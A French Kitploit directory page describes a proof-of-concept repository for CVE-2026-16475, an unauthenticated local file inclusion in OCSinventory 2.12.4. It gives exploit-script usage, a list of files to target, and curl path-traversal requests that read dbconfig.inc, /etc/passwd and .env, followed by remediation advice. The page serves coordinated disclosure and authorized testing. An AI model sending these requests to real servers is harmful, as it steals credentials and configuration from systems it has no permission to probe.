Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-16475-PoC — Ceci est le dépôt officiel contenant le PoC de la CVE-2026-16475, une LFI dans OCSinventory 2.12.4. | Kitploit
Outils/GitHubGitHub/afertar/cve-2026-16475-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubafertar/cve-2026-16475-poc

CVE-2026-16475-PoC

Ceci est le dépôt officiel contenant le PoC de la CVE-2026-16475, une LFI dans OCSinventory 2.12.4.

Voir le dépôt
2il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-16475 - PoC LFI OCSinventory

Vulnérabilité d'inclusion de fichier local dans OCSinventory 2.12.4

Détails de la vulnérabilité

ID CVE : CVE-2026-16475
Score CVSS : 6,9 (Moyen)
CWE : CWE-98 (Contrôle inapproprié du nom de fichier pour l'instruction Include/Require dans un programme PHP)
Version affectée : OCSinventory 2.12.4
État : Corrigé dans les dernières versions

Description

Une vulnérabilité d'inclusion de fichier local (LFI) est présente dans le point de terminaison /ajax/teledeployoptions.php en raison d'un assainissement inapproprié du paramètre linkedoptions avant son utilisation dans une opération dynamique d'inclusion de fichier XML.

Ce point de terminaison est conçu pour charger des fichiers de configuration XML, mais ne valide pas correctement le paramètre linkedoptions, ce qui permet des attaques par traversée de chemin.

Un attaquant distant non authentifié peut exploiter cette vulnérabilité pour :

  • Inclure et accéder à des fichiers XML arbitraires dans le répertoire de l'application
  • Lire des fichiers non-XML via les messages d'erreur de l'analyseur XML
  • Divulguer des informations sensibles sur les ressources internes de l'application
  • Énumérer les fichiers système et effectuer une prise d'empreinte du système d'exploitation
  • Impact

    • Confidentialité : ÉLEVÉE - Accès à des fichiers arbitraires (fichiers de configuration, code source, journaux, fichiers système)
    • Intégrité : AUCUNE
    • Disponibilité : AUCUNE
    • Authentification requise : NON
    • Interaction utilisateur : NON

    Utilisation

    Prérequis

    root@kitploit:~
    pip install -r requirements.txt
    

    Version Python (recommandée)

    root@kitploit:~
    python3 exploit.py -u http://target.com -v
    

    Options :

    • -u, --url - URL cible (obligatoire)
    • -v, --verbose - Sortie détaillée
    • -o, --output - Enregistrer les lectures réussies dans un fichier

    Exemple :

    root@kitploit:~
    python3 exploit.py -u http://ocs.example.com -v -o results.txt
    

    Version Bash

    root@kitploit:~
    ./lfi_test.sh
    

    Modifiez la variable BASE_URL dans le script :

    root@kitploit:~
    BASE_URL="http://target.com/ajax/teledeployoptions.php"
    

    Cibles énumérées

    • Fichiers de configuration de l'application (dbconfig.inc, .env, config.inc)
    • Fichiers de travail XML (bashscriptopt, executableopt, msiapplicationopt)
    • Journaux système (apache2, mysql, auth)
    • Fichiers système (/proc/, /etc/)
    • Secrets de l'application (composer, fichiers de package, .htaccess)

    Exemple d'exploitation

    root@kitploit:~
    # Read database config
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
    
    # Read passwd file
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
    
    # Read environment file
    curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
    

    Remédiation

    Pour les utilisateurs :

    • Mettez à jour OCSinventory vers la dernière version immédiatement
    • Implémentez des règles WAF pour bloquer les schémas de traversée de répertoire

    Pour les développeurs :

    • Utilisez basename() ou des fonctions similaires pour empêcher la traversée de chemin
    • Validez et assainissez toutes les entrées utilisateur avant les opérations sur les fichiers
    • Implémentez des contrôles d'accès appropriés
    • Utilisez des listes blanches pour les chemins de fichiers valides

    Références

    • Avis INCIBE (ES) - Autorité officielle de coordination CVE
    • OCS Inventory GitHub
    • OWASP Path Traversal
    • Définition CWE-98

    Remarque : CVE-2026-16475 est coordonné via INCIBE et peut ne pas encore être indexé dans NVD. Consultez la source INCIBE pour obtenir des informations faisant autorité.

    Mentions légales

    Uniquement à des fins éducatives et de tests autorisés

    Voir DISCLAIMER.md pour l'avis légal complet.

    Auteur

    Adrián Ferrer Tarí


    Divulgation responsable coordonnée via INCIBE

    Télécharger l’outil